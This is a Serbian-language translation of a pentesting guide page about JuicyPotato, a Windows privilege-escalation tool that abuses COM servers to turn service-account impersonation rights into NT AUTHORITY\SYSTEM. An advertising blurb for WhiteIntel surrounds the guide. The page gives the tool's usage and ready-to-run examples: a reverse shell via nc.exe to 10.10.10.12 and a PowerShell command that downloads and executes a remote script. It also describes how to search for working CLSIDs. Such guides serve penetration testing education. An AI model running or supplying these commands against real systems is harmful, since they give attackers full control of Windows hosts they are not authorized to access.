WhiteIntel

WhiteIntel je pretraživač na dark vebu koji nudi besplatne funkcionalnosti za proveru da li je kompanija ili njeni korisnici ugroženi od malvera za krađu podataka.

Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera za krađu informacija.

Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za besplatno na:

Sočni krompir (zloupotreba zlatnih privilegija)

Šećerom prekrivena verzija RottenPotatoNG, sa malo soka, tj. još jedan alat za eskalaciju privilegija na lokalnom nivou, od Windows servisnih naloga do NT AUTHORITY\SYSTEM

Možete preuzeti sočni krompir sa https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts

Rezime

Iz sočnog krompira Readme:

RottenPotatoNG i njegove varijante iskorišćavaju lanac eskalacije privilegija zasnovan na BITS servisu koji ima MiTM slušaoca na 127.0.0.1:6666 i kada imate privilegije SeImpersonate ili SeAssignPrimaryToken. Tokom pregleda Windows izgradnje otkrili smo postavku gde je BITS namerno onemogućen i port 6666 je zauzet.

Odlučili smo da oružamo RottenPotatoNG: Pozdravite Sočni Krompir.

Za teoriju, pogledajte Rotten Krompir - Eskalacija privilegija sa servisnih naloga na SYSTEM i pratite lanac veza i referenci.

Otkrili smo da, osim BITS, postoji nekoliko COM servera koje možemo zloupotrebiti. Samo treba da:

1. budu instancirani od strane trenutnog korisnika, obično "servisnog korisnika" koji ima privilegije impersonacije

2. implementiraju IMarshal interfejs

3. pokreću se kao privilegovan korisnik (SYSTEM, Administrator, …)

Nakon nekih testiranja smo dobili i testirali obimnu listu interesantnih CLSID-ova na nekoliko verzija Windowsa.

Sočni detalji

Sočni krompir vam omogućava da:

• Ciljajte CLSID izaberite bilo koji CLSID koji želite. Ovde možete pronaći listu organizovanu po OS-u.

• COM slušajući port definišite COM slušajući port koji preferirate (umesto marshalled hardkodiranog 6666)

• COM slušajuća IP adresa vezujte server na bilo koju IP adresu

• Režim kreiranja procesa u zavisnosti od privilegija impersoniranog korisnika možete birati između:

• CreateProcessWithToken (potrebno je SeImpersonate)

• CreateProcessAsUser (potrebno je SeAssignPrimaryToken)

• oba

• Proces za pokretanje pokrenite izvršnu datoteku ili skriptu ako eksploatacija uspe

• Argument procesa prilagodite argumente pokrenutog procesa

• RPC Server adresa za prikriven pristup možete se autentifikovati na eksterni RPC server

• RPC Server port korisno ako želite da se autentifikujete na eksterni server a firewall blokira port 135…

• TEST režim pretežno za testiranje, tj. testiranje CLSID-ova. Kreira DCOM i ispisuje korisnika tokena. Pogledajte ovde za testiranje

Upotreba

T:\>JuicyPotato.exe
JuicyPotato v0.1

Mandatory args:
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: program to launch
-l <port>: COM server listen port


Optional args:
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)

Završne misli

Iz juicy-potato Readme:

Ako korisnik ima privilegije SeImpersonate ili SeAssignPrimaryToken, tada ste SYSTEM.

Gotovo je nemoguće sprečiti zloupotrebu svih ovih COM servera. Možete razmisliti o izmeni dozvola ovih objekata putem DCOMCNFG, ali srećno, to će biti izazovno.

Stvarno rešenje je zaštita osetljivih naloga i aplikacija koje se izvršavaju pod nalozima * SERVICE. Zaustavljanje DCOM bi svakako sprečilo ovu eksploataciju, ali bi moglo imati ozbiljan uticaj na osnovni OS.

Od: http://ohpe.it/juicy-potato/

Primeri

Napomena: Posetite ovu stranicu za listu CLSID-ova koje možete isprobati.

Dobijanje reverznog shell-a pomoću nc.exe

c:\Users\Public>JuicyPotato -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c c:\users\public\desktop\nc.exe -e cmd.exe 10.10.10.12 443" -t *

Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
......
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

c:\Users\Public>

Powershell povratna vrijednost

.\jp.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.14.3:8080/ipst.ps1')" -t *

Pokrenite novi CMD (ako imate RDP pristup)

Problemi sa CLSID-om

Često se podrazumevani CLSID koji JuicyPotato koristi ne radi i eksploatacija ne uspeva. Obično je potrebno više pokušaja da pronađete radni CLSID. Da biste dobili listu CLSID-ova koje treba isprobati za određeni operativni sistem, posetite ovu stranicu:

Provera CLSID-ova

Prvo, trebaće vam neki izvršni fajlovi osim juicypotato.exe.

Preuzmite Join-Object.ps1 i učitajte ga u svoju PS sesiju, zatim preuzmite i izvršite GetCLSID.ps1. Taj skript će kreirati listu mogućih CLSID-ova za testiranje.

Zatim preuzmite test_clsid.bat (promenite putanju do liste CLSID-ova i do izvršnog fajla juicypotato) i izvršite ga. Počeće da isprobava svaki CLSID, i kada se broj porta promeni, to znači da je CLSID uspeo.

Proverite radne CLSID-ove koristeći parametar -c

Reference

• https://github.com/ohpe/juicy-potato/blob/master/README.md

WhiteIntel

WhiteIntel je pretraživač pokretan dark-webom koji nudi besplatne funkcionalnosti za proveru da li je kompanija ili njeni korisnici ugroženi od malvera koji kradu informacije.

Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera koji kradu informacije.

Možete posetiti njihovu veb lokaciju i isprobati njihov pretraživač besplatno na: